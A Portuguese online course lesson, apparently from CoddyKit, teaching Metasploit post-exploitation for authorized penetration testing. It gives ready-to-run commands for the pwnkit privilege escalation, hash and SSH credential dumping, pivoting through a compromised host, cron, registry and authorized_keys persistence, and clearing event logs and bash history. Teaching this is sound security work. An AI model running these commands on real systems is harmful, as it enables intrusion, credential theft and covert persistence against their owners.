Pós-Exploração: Pivotar e Persistir
Use os módulos de pós-exploração do Metasploit para escalonamento de privilégios, extração de credenciais e persistência.
Pós-Exploração: Pivotar e Persistir é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 4 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.
Objetivos da pós-exploração
Após o acesso inicial, os objetivos do invasor são: elevar privilégios, coletar informações, manter o acesso persistente e mover-se lateralmente para alcançar o verdadeiro objetivo (dados, sistemas ou controle do domínio).
Consciência situacional
Os primeiros passos após obter acesso ao console são entender onde você está. Colete informações do sistema, configuração de rede, privilégios do usuário atual, processos em execução e variáveis de ambiente.
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_systemElevação de privilégios
A elevação local de privilégios passa de um console com poucos privilégios para root/SYSTEM. O local_exploit_suggester do Metasploit identifica explorações locais e do núcleo aplicáveis com base na versão do OS de destino.
meterpreter > run post/multi/recon/local_exploit_suggester
# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > runColeta de credenciais
Reúna credenciais: senhas com hash, credenciais em texto simples nos arquivos de configuração, senhas salvas no navegador e chaves SSH. Elas permitem o movimento lateral e a persistência.
meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds
# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/envPivoteamento: encaminhamento de portas
O pivoteamento usa um host comprometido como ponte para alcançar redes internas isoladas. O portfwd do Metasploit cria encaminhamentos de portas locais por meio da sessão do Meterpreter.
# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20
# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u rootRoteamento por meio de sessões
O módulo de rotas do Metasploit adiciona rotas de rede por meio de uma sessão, permitindo que outros módulos alcancem redes acessíveis somente pelo host usado como pivô.
msf6 > route add 10.10.10.0/24 1 # route via session 1
msf6 > route print
# Now run modules targeting 10.10.10.x
# through session 1 as pivotPivoteamento com proxy SOCKS
Um proxy SOCKS pelo Metasploit (ou chisel/ssh -D) permite rotear ferramentas arbitrárias pelo pivô usando proxychains — possibilitando que nmap, curl e navegadores alcancem redes internas.
# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j
# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24Mecanismos de persistência
A persistência garante que o acesso sobreviva a reinicializações e à perda da sessão. Métodos comuns: tarefas do cron (Linux), chaves de execução do registro (Windows), injeção de chaves authorized_keys do SSH e instalação de serviços.
# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence
# Windows: registry
meterpreter > run post/windows/manage/persistence_exe
# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keysApagando rastros
Os invasores limpam registros para manter o sigilo. Observação de segurança: as soluções modernas de SIEM e EDR enviam registros para fora do host em tempo real — limpar os registros locais não apaga os registros centralizados.
meterpreter > clearev # clear Windows event logs
# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_historyMódulos de pós-exploração
O Metasploit inclui centenas de módulos de pós-exploração para Windows e Linux: coleta de credenciais, dados do navegador, captura de teclas, captura de telas e enumeração de rede.
msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > runSabendo quando parar
Em testes de invasão autorizados, pare quando alcançar o objetivo de escopo acordado ou encontrar dados aos quais não está autorizado a ter acesso. Documente cuidadosamente seu caminho — essa é a cadeia de ataque que você relatará.
Verificação rápida
O que o comando "route add" do Metasploit permite fazer?
Resumo: pós-exploração
A pós-exploração baseia-se no acesso inicial para alcançar um impacto real: elevação de privilégios, coleta de credenciais, movimento lateral e persistência. O Metasploit fornece módulos de pós-exploração para cada fase. Documente cada etapa — a cadeia de ataque, da entrada ao objetivo, é o principal resultado entregue em um teste de invasão.
Aprenda Cyber Security Academy com um tutor de IA — grátis
Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.
- Cursos
- 76
- Aulas
- 303
Perguntas Frequentes
A aula “Pós-Exploração: Pivotar e Persistir” é grátis?
Sim — o texto completo de “Pós-Exploração: Pivotar e Persistir” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.
O que vou aprender em “Pós-Exploração: Pivotar e Persistir”?
Use os módulos de pós-exploração do Metasploit para escalonamento de privilégios, extração de credenciais e persistência. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Cyber Security Academy?
Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 4 de 4.
Quanto tempo leva a aula “Pós-Exploração: Pivotar e Persistir”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Cyber Security Academy?
Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Arquitetura do Metasploit e msfconsole
- Exploração de uma Vulnerabilidade Conhecida
- Cargas: em Estágios ou sem Estágios, Meterpreter
- Pós-Exploração: Pivotar e Persistir